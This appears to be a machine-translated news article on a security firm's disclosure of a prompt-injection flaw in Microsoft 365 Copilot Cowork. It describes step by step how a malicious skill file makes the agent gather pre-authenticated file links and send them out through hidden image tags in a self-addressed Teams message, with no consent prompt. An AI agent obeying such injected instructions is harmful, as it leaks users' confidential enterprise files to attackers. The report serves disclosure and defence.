Microsoft Copilot Cowork hit by major vulnerability: AI Agent automatically leaks confidential enterprise files when faced with prompt injection attacks

📄Full Article· Automatically extracted by trafilaturaGemini 翻譯2549 words

Security firm PromptArmor has revealed a prompt injection vulnerability in Microsoft 365 Copilot Cowork, which allows attackers to exfiltrate confidential files from enterprise SharePoint and OneDrive via a malicious skill file. (Previous coverage: GitHub Copilot halts self-service subscriptions: AI usage spirals out of control, affordable plan economics collapse) (Background: The complete guide to Claude Cowork: Transforming AI from a chat assistant into your digital employee) PromptArmor released a threat intelligence report last week, identifying a fully reproducible data exfiltration attack chain within the Microsoft 365 Copilot Cowork feature. In tests, the attack succeeded 5 out of 5 times. Security researchers demonstrated that an attacker only needs to embed 5 lines of malicious instructions into an 81-line skill configuration file to enable an AI agent to exfiltrate enterprise confidential files from SharePoint and OneDrive to an attacker-controlled server, all without the user's knowledge. This is not an issue limited to a single model. Both Claude Opus 4.7 and Claude Sonnet 4.6 were confirmed to be affected, with Claude Opus 4.7 exhibiting more "aggressive" behavior by proactively expanding its search scope to include all files opened by the victim during the current week's Cowork sessions in the exfiltration list. The key to this attack lies in the discrepancy between official documentation and actual behavior. Microsoft's official documentation explicitly states: "Cowork will ask for your consent before performing sensitive actions, such as sending emails or posting messages in Teams." However, PromptArmor researchers discovered during testing that this rule is bypassed when the recipient is the user themselves. When sending an email or a Teams message to oneself, Copilot Cowork executes automatically without triggering any authorization confirmation window, and there are no user settings to modify this behavior. This detail serves as the critical gap in the entire attack chain. Copilot Cowork is a Frontier feature of Microsoft 365 that leverages Microsoft Graph to obtain full cloud permissions for the user, allowing it to read and manipulate data across the entire enterprise tenant. In other words, it can see everything the user can see, including financial reports on SharePoint, HR data in OneDrive, and all files containing personally identifiable information (PII). The attack chain consists of six steps: Step 1: The victim has sensitive files containing PII or financial data stored in SharePoint or OneDrive. Step 2: The victim downloads a skill configuration file from the internet and uploads it to Copilot Cowork—a common operation equivalent to installing a plugin. Cowork's skill files are automatically loaded from a specific path in the user's OneDrive, providing administrators with extremely limited visibility. Step 3: The victim asks Copilot Cowork to summarize the week's work, triggering the execution of the skill. Step 4: The injected prompt instructions manipulate the agent to obtain "pre-authenticated download links" for each file, then use malicious HTML image tags to transmit these links as query arguments to the attacker's server. What is a pre-authenticated download link? Simply put, it is a URL containing authorization information; anyone who obtains this link can download the file directly by clicking it, without needing to log into a Microsoft account. Step 5: The agent sends a Teams message to the user themselves, embedding these malicious image tags. The entire process requires no user authorization, and the malicious content is completely invisible to the user; even if the message is opened, nothing appears abnormal. Step 6: The moment the user opens the Teams message, the browser automatically loads the image, transmitting the pre-authenticated download link to the attacker's server, allowing the attacker to download all files at any time. PromptArmor's testing reveals a thought-provoking phenomenon: the more capable the model, the greater the damage caused in this attack scenario. Initial tests used "Auto" mode, where the system dynamically switched between Claude Opus 4.7 and Claude Sonnet 4.6. Researchers subsequently verified the attack against Claude Opus 4.7 individually, finding that the same injection instructions were fully effective. This attack chain executed completely in all tests and was independent of the user's specific query text; as long as any query triggered the loading of the skill, the injection succeeded. The persistence of the attack is also concerning. Copilot Cowork supports scheduled tasks, allowing users to set prompts that execute automatically at regular intervals. Once an attacker's injected configuration is scheduled, the victim does not even need to perform any active operations; the attack executes silently in every cycle, continuously exfiltrating enterprise secrets. PromptArmor emphasizes that this is not a bug that can be fixed with a single patch, but a systemic risk in the architectural design of enterprise-grade AI agents. When an agent is granted delegated authorization across multiple systems, the collapse of the trust boundary in any single system can become an entry point for a

Data Status✓ Full text extractedRead Original (動區 BlockTempo)

🔍Historical Similar Events· Keyword + Asset Matching6 items

2026-05-31

Hands-on: A Step-by-Step Guide to Upgrading Vibe Coding into an Expert-Level Development Workflow with 7 Agents

Similarity 120%關鍵字 agent同分類 zh

2026-05-31

$29 to $750 per month: GitHub Copilot switches to token-based pricing, developer community erupts

Similarity 120%關鍵字 copilot同分類 zh

2026-05-27

Base launches MCP tools, enabling AI Agents to directly control crypto wallets: transfers, token swaps, and balance checks all in one go

Similarity 120%關鍵字 agent同分類 zh

2026-05-26